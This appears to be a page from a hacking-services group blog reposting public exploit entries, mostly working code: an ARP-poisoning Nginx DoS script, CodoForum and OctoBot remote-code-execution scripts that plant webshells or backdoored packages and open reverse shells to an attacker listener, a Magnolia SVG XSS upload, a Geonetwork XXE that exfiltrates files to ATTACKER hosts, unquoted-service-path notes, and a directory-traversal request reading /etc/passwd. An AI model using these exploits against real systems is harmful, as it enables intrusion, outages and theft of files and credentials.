Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863128727

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: Nginx 1.20.0 - Denial of Service (DOS)
# Date: 2022-6-29
# Exploit Author: Mohammed Alshehri - https://Github.com/M507
# Vendor Homepage: https://nginx.org/
# Software Link: https://github.com/nginx/nginx/releases/tag/release-1.20.0
# Version: 0.6.18 - 1.20.0
# Tested on: Ubuntu 18.04.4 LTS bionic 
# CVE: CVE-2021-23017
# The bug was discovered by X41 D-SEC GmbH, Luis Merino, Markus Vervier, Eric Sesterhenn
# python3 poc.py --target 172.1.16.100 --dns_server 172.1.16.1
# The service needs to be configured to use Nginx resolver

from scapy.all import *
from multiprocessing import Process
from binascii import hexlify, unhexlify
import argparse, time, os

def device_setup():
    os.system("echo '1' >> /proc/sys/net/ipv4/ip_forward")
    os.system("iptables -A FORWARD -p UDP --dport 53 -j DROP")

def ARPP(target, dns_server):
    print("[*] Sending poisoned ARP packets")
    target_mac = getmacbyip(target)
    dns_server_mac = getmacbyip(dns_server)
    while True:
        time.sleep(2)
        send(ARP(op=2, pdst=target, psrc=dns_server, hwdst=target_mac),verbose = 0)
        send(ARP(op=2, pdst=dns_server, psrc=target, hwdst=dns_server_mac),verbose = 0)

def exploit(target):
    print("[*] Listening ")
    sniff (filter="udp and port 53 and host " + target, prn = process_received_packet)

"""
RFC schema
 0                   1                   2                   3
 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|             LENGTH            |               ID              |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|Q| OPCODE|A|T|R|R|Z|A|C| RCODE |            QDCOUNT            |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|            ANCOUNT            |            NSCOUNT            |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|            ARCOUNT            |               QD              |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|               AN              |               NS              |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|               AR              |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

Fig. DNS                             

"""
def process_received_packet(received_packet):
    if received_packet[IP].src == target_ip:
        if received_packet.haslayer(DNS):
            if DNSQR in received_packet:
                print("[*] the received packet: " + str(bytes_hex(received_packet)))
                print("[*] the received DNS request: " + str(bytes_hex(received_packet[DNS].build())))
                try:
                    # \/    the received DNS request
                    dns_request = received_packet[DNS].build()
                    null_pointer_index = bytes(received_packet[DNS].build()).find(0x00,12)
                    print("[*] debug: dns_request[:null_pointer_index] : "+str(hexlify(dns_request[:null_pointer_index])))
                    print("[*] debug: dns_request[null_pointer_index:] : "+str(hexlify(dns_request[null_pointer_index:])))
                    payload = [
                        dns_request[0:2],
                        b"\x81\x80\x00\x01\x00\x01\x00\x00\x00\x00",
                        dns_request[12:null_pointer_index+1],
                        dns_request[null_pointer_index+1:null_pointer_index+3],
                        dns_request[null_pointer_index+3:null_pointer_index+5],
                        b"\xC0\x0C\x00\x05\x00\x01\x00\x00\x0E\x10",
                        b"\x00\x0B\x18\x41\x41\x41\x41\x41\x41\x41",
                        b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41",
                        b"\x41\x41\x41\x41\x41\x41\x41\xC0\x04"
                    ]
                    
                    payload = b"".join(payload)
                    spoofed_pkt = (Ether()/IP(dst=received_packet[IP].src, src=received_packet[IP].dst)/\
                        UDP(dport=received_packet[UDP].sport, sport=received_packet[UDP].dport)/\
                        payload)
                    print("[+] dns answer: "+str(hexlify(payload)))
                    print("[+] full packet: " + str(bytes_hex(spoofed_pkt)))

                    sendp(spoofed_pkt, count=1)
                    print("\n[+] malicious answer was sent")
                    print("[+] exploited\n")
                except:
                    print("\n[-] ERROR")

def main():
    global target_ip
    parser = argparse.ArgumentParser()
    parser.add_argument("-t", "--target", help="IP address of the target")
    parser.add_argument("-r", "--dns_server", help="IP address of the DNS server used by the target")
    args = parser.parse_args()
    target_ip = args.target
    dns_server_ip = args.dns_server
    device_setup()
    processes_list = []
    ARPPProcess = Process(target=ARPP,args=(target_ip,dns_server_ip))
    exploitProcess = Process(target=exploit,args=(target_ip,))
    processes_list.append(ARPPProcess)
    processes_list.append(exploitProcess)
    for process in processes_list:
        process.start()
    for process in processes_list:
        process.join()

if __name__ == '__main__':
    target_ip = ""
    main()
HireHackking 
# Exploit Title: Dr. Fone v4.0.8- 'net_updater32.exe' Unquoted Service Path
# Discovery Date: 2022-05-07
# Discovery by: Esant1490
# Vendor Homepage: https://drfone.wondershare.net
# Software Link : https://download.wondershare.net/drfone_full4008.exe
# Tested Version: 4.0.8
# Tested on OS: Windows 10 Pro x64 en
# Vulnerability Type: Unquoted Service Path

# Find the discover Unquoted Service Path Vulnerability:

C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"
|findstr /i /v "C:\Windows\\" |findstr /i /v """

Wondershare Install Assist Service Wondershare InstallAssist
C:\ProgramData\Wondershare\Service\InstallAssistService.exe Auto

Wondershare Application Framework Service WsAppService C:\Program Files
(x86)\Wondershare\WAF\2.4.3.243\WsAppService.exe Auto
Wondershare Application Update Service 3.0

WsAppService3 C:\Program Files
(x86)\Wondershare\WAF3\3.0.0.308\WsAppService3.exe Auto

Wondershare Driver Install Service WsDrvInst C:\Program Files
(x86)\Wondershare\drfone\Addins\Unlock\DriverInstall.exe Auto

# Service info:

C:\>sc qc WsDrvInst
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: WsDrvInst
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files
(x86)\Wondershare\drfone\Addins\Unlock\DriverInstall.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : Wondershare Driver Install Service
DEPENDENCIAS : RPCSS
NOMBRE_INICIO_SERVICIO: LocalSystem

#Exploit:

A successful attempt to exploit this vulnerability could allow to execute
code during startup or reboot with the elevated privileges.
HireHackking 
# Exploit Title: Magnolia CMS 6.2.19 - Stored Cross-Site Scripting (XSS)
# Date: 08/05/2022
# Exploit Author: Giulio Garzia 'Ozozuz'
# Vendor Homepage: https://www.magnolia-cms.com/
# Software Link: https://nexus.magnolia-cms.com/service/local/repositories/magnolia.public.releases/content/info/magnolia/bundle/magnolia-community-demo-webapp/6.2.19/magnolia-community-demo-webapp-6.2.19-tomcat-bundle.zip
# Version: 6.2.19
# Tested on: Linux, Windows, Docker
# CVE : CVE-2022-33098

Explanation
Malicious user with the permissions to upload profile picture for a contact, can upload an SVG file containing malicious JavaScript code that will be executed by anyone opening the malicious resource.

===== REQUEST =====
POST /magnoliaAuthor/.magnolia/admincentral/APP/UPLOAD/0/140/action/cba61868-b27a-4d50-983d-adf48b992be1 HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------399178799522967017241464837908
Content-Length: 620
Connection: close
Cookie: csrf=_WLVhBj-Vv-sdc37C4GBahMJ1tPS_7o_Y1VCEEw18Ks; JSESSIONID=F2678A586264F811C2746E4138BEF34D
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin

-----------------------------399178799522967017241464837908
Content-Disposition: form-data; name="140_file"; filename="xss.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">
    alert('POC - Magnolia CMS');
  </script>
</svg>

-----------------------------399178799522967017241464837908--
HireHackking 
# Exploit Title: CodoForum v5.1 - Remote Code Execution (RCE)
# Date: 06/07/2022
# Exploit Author: Krish Pandey (@vikaran101)
# Vendor Homepage: https://codoforum.com/
# Software Link: https://bitbucket.org/evnix/codoforum_downloads/downloads/codoforum.v.5.1.zip
# Version: CodoForum v5.1
# Tested on: Ubuntu 20.04
# CVE: CVE-2022-31854

#!/usr/bin/python3

import requests
import time
import optparse
import random
import string

banner = """
  ______     _______     ____   ___ ____  ____      _____ _  ___ ____  _  _   
 / ___\ \   / / ____|   |___ \ / _ \___ \|___ \    |___ // |( _ ) ___|| || |  
| |    \ \ / /|  _| _____ __) | | | |__) | __) |____ |_ \| |/ _ \___ \| || |_ 
| |___  \ V / | |__|_____/ __/| |_| / __/ / __/_____|__) | | (_) |__) |__   _|
 \____|  \_/  |_____|   |_____|\___/_____|_____|   |____/|_|\___/____/   |_|  
"""

print("\nCODOFORUM V5.1 ARBITRARY FILE UPLOAD TO RCE(Authenticated)")
print(banner)
print("\nExploit found and written by: @vikaran101\n")

parser = optparse.OptionParser()
parser.add_option('-t', '--target-url', action="store", dest='target', help='path of the CodoForum v5.1 install')
parser.add_option('-u', '--username', action="store", dest='username', help='admin username')
parser.add_option('-p', '--password', action="store", dest='password', help='admin password')
parser.add_option('-i', '--listener-ip', action="store", dest='ip', help='listener address')
parser.add_option('-n', '--port', action="store", dest='port', help='listener port number')

options, args = parser.parse_args()

proxy = {'http': 'http://127.0.0.1:8080', 'https': 'https://127.0.0.1:8080'}

if not options.target or not options.username or not options.password or not options.ip or not options.port:
    print("[-] Missing arguments!")
    print("[*] Example usage: ./exploit.py -t [target url] -u [username] -p [password] -i [listener ip] -n [listener port]")
    print("[*] Help menu: ./exploit.py -h OR ./exploit.py --help")
    exit()

loginURL = options.target + '/admin/?page=login'
globalSettings = options.target + '/admin/index.php?page=config'
payloadURL = options.target + '/sites/default/assets/img/attachments/'

session = requests.Session()

randomFileName = ''.join((random.choice(string.ascii_lowercase) for x in range(10)))

def getPHPSESSID():
    
    try:
        get_PHPID = session.get(loginURL)
        headerDict = get_PHPID.headers
        cookies = headerDict['Set-Cookie'].split(';')[0].split('=')[1]
        return cookies
    except:
        exit()

phpID = getPHPSESSID()

def login():
    send_cookies = {'cf':'0'}
    send_headers = {'Host': loginURL.split('/')[2], 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8','Accept-Language':'en-US,en;q=0.5','Accept-Encoding':'gzip, deflate','Content-Type':'multipart/form-data; boundary=---------------------------2838079316671520531167093219','Content-Length':'295','Origin':loginURL.split('/')[2],'Connection':'close','Referer':loginURL,'Upgrade-Insecure-Requests':'1'}
    send_creds = "-----------------------------2838079316671520531167093219\nContent-Disposition: form-data; name=\"username\"\n\nadmin\n-----------------------------2838079316671520531167093219\nContent-Disposition: form-data; name=\"password\"\n\nadmin\n-----------------------------2838079316671520531167093219--"
    auth = session.post(loginURL, headers=send_headers, cookies=send_cookies, data=send_creds, proxies=proxy)

    if "CODOFORUM | Dashboard" in auth.text:
        print("[+] Login successful")

def uploadAndExploit():
    send_cookies = {'cf':'0', 'user_id':'1', 'PHPSESSID':phpID}
    send_headers = {'Content-Type':'multipart/form-data; boundary=---------------------------7450086019562444223451102689'}
    send_payload = '\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="site_title"\n\nCODOLOGIC\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="site_description"\n\ncodoforum - Enhancing your forum experience with next generation technology!\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="admin_email"\n\nadmin@codologic.com\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="default_timezone"\n\nEurope/London\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="register_pass_min"\n\n8\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="num_posts_all_topics"\n\n30\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="num_posts_cat_topics"\n\n20\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="num_posts_per_topic"\n\n20\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_attachments_path"\n\nassets/img/attachments\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_attachments_exts"\n\njpg,jpeg,png,gif,pjpeg,bmp,txt\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_attachments_size"\n\n3\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_attachments_mimetypes"\n\nimage/*,text/plain\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_tags_num"\n\n5\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_tags_len"\n\n15\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="reply_min_chars"\n\n10\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="insert_oembed_videos"\n\nyes\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_privacy"\n\neveryone\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="approval_notify_mails"\n\n\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_header_menu"\n\nsite_title\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_logo"; filename="' + randomFileName + '.php"\nContent-Type: application/x-php\n\n<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc ' + options.ip + ' ' + options.port + ' >/tmp/f");?> \n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="login_by"\n\nUSERNAME\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="force_https"\n\nno\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="user_redirect_after_login"\n\ntopics\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="sidebar_hide_topic_messages"\n\noff\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="sidebar_infinite_scrolling"\n\non\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="show_sticky_topics_without_permission"\n\nno\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="CSRF_token"\n\n23cc3019cadb6891ebd896ae9bde3d95\n-----------------------------7450086019562444223451102689--\n'
    exploit = requests.post(globalSettings, headers=send_headers, cookies=send_cookies, data=send_payload, proxies=proxy)

    print("[*] Checking webshell status and executing...")
    payloadExec = session.get(payloadURL + randomFileName + '.php', proxies=proxy)
    if payloadExec.status_code == 200:
        print("[+] Payload uploaded successfully and executed, check listener")
    else:
        print("[-] Something went wrong, please try uploading the shell manually(admin panel > global settings > change forum logo > upload and access from " + payloadURL +"[file.php])")
login()
uploadAndExploit()
HireHackking

OctoBot WebInterface 0.4.3 - Remote Code Execution (RCE)

HACKER · %s · %s

# Exploit Title: OctoBot WebInterface 0.4.3 - Remote Code Execution (RCE) # Date: 9/2/2021 # Exploit Author: Samy Younsi, Thomas Knudsen # Vendor Homepage: https://www.octobot.online/ # Software Link: https://github.com/Drakkar-Software/OctoBot # Version: 0.4.0beta3 - 0.4.3 # Tested on: Linux (Ubuntu, CentOs) # CVE : CVE-2021-36711 from __future__ import print_function, unicode_literals from bs4 import BeautifulSoup import argparse import requests import zipfile import time import sys import os def banner(): sashimiLogo = """ _________ . . (.. \_ , |\ /| \ O \ /| \ \/ / \______ \/ | \ / vvvv\ \ | / | _ _ _ _ \^^^^ == \_/ | | | __ _ | || |__ (_)_ __ ___ (_)`\_ === \. | / __)/ _` / __| '_ \| | '_ ` _ \| |/ /\_ \ / | \__ | (_| \__ | | | | | | | | | | ||/ \_ \| / ( /\__,_( |_| |_|_|_| |_| |_|_| \________/ |_| |_| \033[1;91mOctoBot Killer\033[1;m Author: \033[1;92mNaqwada\033[1;m RuptureFarm 1029 FOR EDUCATIONAL PURPOSE ONLY. """ return print('\033[1;94m{}\033[1;m'.format(sashimiLogo)) def help(): print('[!] \033[1;93mUsage: \033[1;m') print('[-] python3 {} --RHOST \033[1;92mTARGET_IP\033[1;m --RPORT \033[1;92mTARGET_PORT\033[1;m --LHOST \033[1;92mYOUR_IP\033[1;m --LPORT \033[1;92mYOUR_PORT\033[1;m'.format(sys.argv[0])) print('[-] \033[1;93mNote*\033[1;m If you are using a hostname instead of an IP address please remove http:// or https:// and try again.') def getOctobotVersion(RHOST, RPORT): if RPORT == 443: url = 'https://{}:{}/api/version'.format(RHOST, RPORT) else: url = 'http://{}:{}/api/version'.format(RHOST, RPORT) return curl(url) def restartOctobot(RHOST, RPORT): if RPORT == 443: url = 'https://{}:{}/commands/restart'.format(RHOST, RPORT) else: url = 'http://{}:{}/commands/restart'.format(RHOST, RPORT) try: requests.get(url, allow_redirects=False, verify=False, timeout=1) except requests.exceptions.ConnectionError as e: print('[+] \033[1;92mOctoBot is restarting ... Please wait 30 seconds.\033[1;m') time.sleep(30) def downloadTentaclePackage(octobotVersion): print('[+] \033[1;92mStart downloading Tentacle package for OctoBot {}.\033[1;m'.format(octobotVersion)) url = 'https://static.octobot.online/tentacles/officials/packages/full/base/{}/any_platform.zip'.format(octobotVersion) result = requests.get(url, stream=True) with open('{}.zip'.format(octobotVersion), 'wb') as fd: for chunk in result.iter_content(chunk_size=128): fd.write(chunk) print('[+] \033[1;92mDownload completed!\033[1;m') def unzipTentaclePackage(octobotVersion): zip = zipfile.ZipFile('{}.zip'.format(octobotVersion)) zip.extractall('quests') os.remove('{}.zip'.format(octobotVersion)) print('[+] \033[1;92mTentacle package has been extracted.\033[1;m') def craftBackdoor(octobotVersion): print('[+] \033[1;92mCrafting backdoor for Octobot Tentacle Package {}...\033[1;m'.format(octobotVersion)) path = 'quests/reference_tentacles/Services/Interfaces/web_interface/api/' injectInitFile(path) injectMetadataFile(path) print('[+] \033[1;92mSashimi malicious Tentacle Package for OctoBot {} created!\033[1;m'.format(octobotVersion)) def injectMetadataFile(path): with open('{}metadata.py'.format(path),'r') as metadataFile: content = metadataFile.read() addPayload = content.replace('import json', ''.join('import json\nimport flask\nimport sys, socket, os, pty')) addPayload = addPayload.replace('@api.api.route("/announcements")', ''.join('@api.api.route("/sashimi")\ndef sashimi():\n\ts = socket.socket()\n\ts.connect((flask.request.args.get("LHOST"), int(flask.request.args.get("LPORT"))))\n\t[os.dup2(s.fileno(), fd) for fd in (0, 1, 2)]\n\tpty.spawn("/bin/sh")\n\n\n@api.api.route("/announcements")')) with open('{}metadata.py'.format(path),'w') as newMetadataFile: newMetadataFile.write(addPayload) def injectInitFile(path): with open('{}__init__.py'.format(path),'r') as initFile: content = initFile.read() addPayload = content.replace('announcements,', ''.join('announcements,\n\tsashimi,')) addPayload = addPayload.replace('"announcements",', ''.join('"announcements",\n\t"sashimi",')) with open('{}__init__.py'.format(path),'w') as newInitFile: newInitFile.write(addPayload) def rePackTentaclePackage(): print('[+] \033[1;92mRepacking Tentacle package.\033[1;m') with zipfile.ZipFile('any_platform.zip', mode='w') as zipf: len_dir_path = len('quests') for root, _, files in os.walk('quests'): for file in files: file_path = os.path.join(root, file) zipf.write(file_path, file_path[len_dir_path:]) def uploadMaliciousTentacle(): print('[+] \033[1;92mUploading Sashimi malicious Tentacle .ZIP package on anonfiles.com" link="https://app.recordedfuture.com/live/sc/entity/idn:anonfiles.com" style="">anonfiles.com... May take a minute.\033[1;m') file = { 'file': open('any_platform.zip', 'rb'), } response = requests.post('https://api.anonfiles.com/upload', files=file, timeout=60) zipLink = response.json()['data']['file']['url']['full'] response = requests.get(zipLink, timeout=60) soup = BeautifulSoup(response.content.decode('utf-8'), 'html.parser') zipLink = soup.find(id='download-url').get('href') print('[+] \033[1;92mSashimi malicious Tentacle has been successfully uploaded. {}\033[1;m'.format(zipLink)) return zipLink def curl(url): response = requests.get(url, allow_redirects=False, verify=False, timeout=60) return response def injectBackdoor(RHOST, RPORT, zipLink): print('[+] \033[1;92mInjecting Sashimi malicious Tentacle packages in Ocotobot... May take a minute.\033[1;m') if RPORT == 443: url = 'https://{}:{}/advanced/tentacle_packages?update_type=add_package'.format(RHOST, RPORT) else: url = 'http://{}:{}/advanced/tentacle_packages?update_type=add_package'.format(RHOST, RPORT) headers = { 'Content-Type': 'application/json', 'X-Requested-With': 'XMLHttpRequest', } data = '{"'+zipLink+'":"register_and_install"}' response = requests.post(url, headers=headers, data=data) response = response.content.decode('utf-8').replace('"', '').strip() os.remove('any_platform.zip') if response != 'Tentacles installed': print('[!] \033[1;91mError: Something went wrong while trying to install the malicious Tentacle package.\033[1;m') exit() print('[+] \033[1;92mSashimi malicious Tentacle package has been successfully installed on the OctoBot target.\033[1;m') def execReverseShell(RHOST, RPORT, LHOST, LPORT): print('[+] \033[1;92mExecuting reverse shell on {}:{}.\033[1;m'.format(LHOST, LPORT)) if RPORT == 443: url = 'https://{}:{}/api/sashimi?LHOST={}&LPORT={}'.format(RHOST, RPORT, LHOST, LPORT) else: url = 'http://{}:{}/api/sashimi?LHOST={}&LPORT={}'.format(RHOST, RPORT, LHOST, LPORT) return curl(url) def isPassword(RHOST, RPORT): if RPORT == 443: url = 'https://{}:{}'.format(RHOST, RPORT) else: url = 'http://{}:{}'.format(RHOST, RPORT) return curl(url) def main(): banner() args = parser.parse_args() if isPassword(args.RHOST, args.RPORT).status_code != 200: print('[!] \033[1;91mError: This Octobot Platform seems to be protected with a password!\033[1;m') octobotVersion = getOctobotVersion(args.RHOST, args.RPORT).content.decode('utf-8').replace('"','').replace('OctoBot ','') if len(octobotVersion) > 0: print('[+] \033[1;92mPlatform OctoBot {} detected.\033[1;m'.format(octobotVersion)) downloadTentaclePackage(octobotVersion) unzipTentaclePackage(octobotVersion) craftBackdoor(octobotVersion) rePackTentaclePackage() zipLink = uploadMaliciousTentacle() injectBackdoor(args.RHOST, args.RPORT, zipLink) restartOctobot(args.RHOST, args.RPORT) execReverseShell(args.RHOST, args.RPORT, args.LHOST, args.LPORT) if __name__ == "__main__": parser = argparse.ArgumentParser(description='POC script that exploits the Tentacles upload functionalities on OctoBot. A vulnerability has been found and can execute a reverse shell by crafting a malicious packet. Version affected from 0.4.0b3 to 0.4.0b10 so far.', add_help=False) parser.add_argument('-h', '--help', help=help()) parser.add_argument('--RHOST', help="Refers to the IP of the target machine.", type=str, required=True) parser.add_argument('--RPORT', help="Refers to the open port of the target machine.", type=int, required=True) parser.add_argument('--LHOST', help="Refers to the IP of your machine.", type=str, required=True) parser.add_argument('--LPORT', help="Refers to the open port of your machine.", type=int, required=True) main()
HireHackking

Geonetwork 4.2.0 - XML External Entity (XXE)

HACKER · %s · %s

# Exploit Title: Geonetwork 4.2.0 - XML External Entity (XXE) # Date: 2022-July-11 # Exploit Author: Amel BOUZIANE-LEBLOND (https://twitter.com/amellb) # Vendor Homepage: https://geonetwork-opensource.org/ # Version: Geonetwork 3.10.X through 4.2.0 # Tested on: Microsoft Windows Server & Linux # Description: # GeoNetwork 3.1.x through 4.2.0 # During rendering pdf of map. # The XML parser is now configured securely to validate submitted XML document accepted from an untrusted source, which might result in arbitrary files retrieval from the server. ====================PDF RENDERING==================== POST /geonetwork/pdf/create.json HTTP/1.1 Host: REDACTED Content-Type: application/json Connection: close Content-Length: 563 {"layout":"landscape","srs":"","units":"m","rotation":0,"lang":"fre","dpi":"190","outputFormat":"pdf","layers":[{"opacity":1,"type":"mapServer","baseURL":"http://attacker/xxe.xml","layers":["Tracts",], "format":"image/svg+xml","name":"xxe","extent":[-20037508.34,-20037508.34,20037508.34, 20037508.34], "tileSize":[256,256]}],"enableLegends":true,"hasTitle":true,"hasNoTitle":false,"hasAttribution":false,"pages":[{"center":[172063.3620639667,4200083.030736061],"scale":"2.5E7","dataOwner":"© ","rotation":0,"comment":"ok","title":"ok","langfre":true}]} The parameters baseURL will be your XML files : ====================XXE_ATTACK==================== ====================XXE.XML======================= <!DOCTYPE foo [ <!ENTITY % pe SYSTEM "http://ATTACKER/x.dtd"> %pe; %param1; ]> <foo>&external;</foo> ====================X.dtd========================= They will call the x.dtd <!ENTITY % stuff SYSTEM "file:///etc/hostname"> <!ENTITY % param1 "<!ENTITY external SYSTEM 'ftp://ATTACKER_FTP/%stuff;'>">
HireHackking

Asus GameSDK v1.0.0.4 - 'GameSDK.exe' Unquoted Service Path

HACKER · %s · %s

# Exploit Title: Asus GameSDK v1.0.0.4 - 'GameSDK.exe' Unquoted Service Path # Date: 07/14/2022 # Exploit Author: Angelo Pio Amirante # Version: 1.0.0.4 # Tested on: Windows 10 # Patched version: 1.0.5.0 # CVE: CVE-2022-35899 # Step to discover the unquoted service path: wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """ # Info on the service: C:\>sc qc "GameSDK Service" [SC] QueryServiceConfig OPERAZIONI RIUSCITE NOME_SERVIZIO: GameSDK Service TIPO : 10 WIN32_OWN_PROCESS TIPO_AVVIO : 2 AUTO_START CONTROLLO_ERRORE : 1 NORMAL NOME_PERCORSO_BINARIO : C:\Program Files (x86)\ASUS\GameSDK Service\GameSDK.exe GRUPPO_ORDINE_CARICAMENTO : TAG : 0 NOME_VISUALIZZATO : GameSDK Service DIPENDENZE : SERVICE_START_NAME : LocalSystem # Exploit If an attacker had already compromised the system and the current user has the privileges to write in the "C:\Program Files (x86)\ASUS\" folder or in "C:\" , he could place his own "Program.exe" or "GameSDK.exe" files respectively, and when the service starts, it would launch the malicious file, rather than the original "GameSDK.exe".
HireHackking

Carel pCOWeb HVAC BACnet Gateway 2.1.0 - Directory Traversal

HACKER · %s · %s

# Exploit Title: Carel pCOWeb HVAC BACnet Gateway 2.1.0 - Directory Traversal # Exploit Author: LiquidWorm Vendor: CAREL INDUSTRIES S.p.A. Product web page: https://www.carel.com Affected version: Firmware: A2.1.0 - B2.1.0 Application Software: 2.15.4A Software version: v16 13020200 Summary: pCO sistema is the solution CAREL offers its customers for managing HVAC/R applications and systems. It consists of programmable controllers, user interfaces, gateways and communication interfaces, remote management systems to offer the OEMs working in HVAC/R a control system that is powerful yet flexible, can be easily interfaced to the more widely-used Building Management Systems, and can also be integrated into proprietary supervisory systems. Desc: The device suffers from an unauthenticated arbitrary file disclosure vulnerability. Input passed through the 'file' GET parameter through the 'logdownload.cgi' Bash script is not properly verified before being used to download log files. This can be exploited to disclose the contents of arbitrary and sensitive files via directory traversal attacks. ======================================================================================= /usr/local/www/usr-cgi/logdownload.cgi: --------------------------------------- 01: #!/bin/bash 02: 03: if [ "$REQUEST_METHOD" = "POST" ]; then 04: read QUERY_STRING 05: REQUEST_METHOD=GET 06: export REQUEST_METHOD 07: export QUERY_STRING 08: fi 09: 10: LOGDIR="/usr/local/root/flash/http/log" 11: 12: tmp=${QUERY_STRING%"$"*} 13: cmd=${tmp%"="*} 14: if [ "$cmd" = "dir" ]; then 15: PATHCURRENT=$LOGDIR/${tmp#*"="} 16: else 17: PATHCURRENT=$LOGDIR 18: fi 19: 20: tmp=${QUERY_STRING#*"$"} 21: cmd=${tmp%"="*} 22: if [ "$cmd" = "file" ]; then 23: FILECURRENT=${tmp#*"="} 24: else 25: if [ -f $PATHCURRENT/lastlog.csv.gz ]; then 26: FILECURRENT=lastlog.csv.gz 27: else 28: FILECURRENT=lastlog.csv 29: fi 30: fi 31: 32: if [ ! -f $PATHCURRENT/$FILECURRENT ]; then 33: echo -ne "Content-type: text/html\r\nCache-Control: no-cache\r\nExpires: -1\r\n\r\n" 34: cat carel.inc.html 35: echo "<center>File not available!</center>" 36: cat carel.bottom.html 37: exit 38: fi 39: 40: if [ -z $(echo $FILECURRENT | grep -i gz ) ]; then 41: if [ -z $(echo $FILECURRENT | grep -i bmp ) ]; then 42: if [ -z $(echo $FILECURRENT | grep -i svg ) ]; then 43: echo -ne "Content-Type: text/csv\r\n" 44: else 45: echo -ne "Content-Type: image/svg+xml\r\n" 46: fi 47: else 48: echo -ne "Content-Type: image/bmp\r\n" 49: fi 50: else 51: echo -ne "Content-Type: application/x-gzip\r\n" 52: fi 53: echo -ne "Content-Disposition: attachment; filename=$FILECURRENT\r\n\r\n" 54: 55: cat $PATHCURRENT/$FILECURRENT ======================================================================================= Tested on: GNU/Linux 4.11.12 (armv7l) thttpd/2.29 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2022-5709 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5709.php 10.05.2022 -- $ curl -s http://10.0.0.3/usr-cgi/logdownload.cgi?file=../../../../../../../../etc/passwd root:x:0:0:root:/root:/bin/sh daemon:x:1:1:daemon:/usr/sbin:/bin/false bin:x:2:2:bin:/bin:/bin/false sys:x:3:3:sys:/dev:/bin/false sync:x:4:100:sync:/bin:/bin/sync 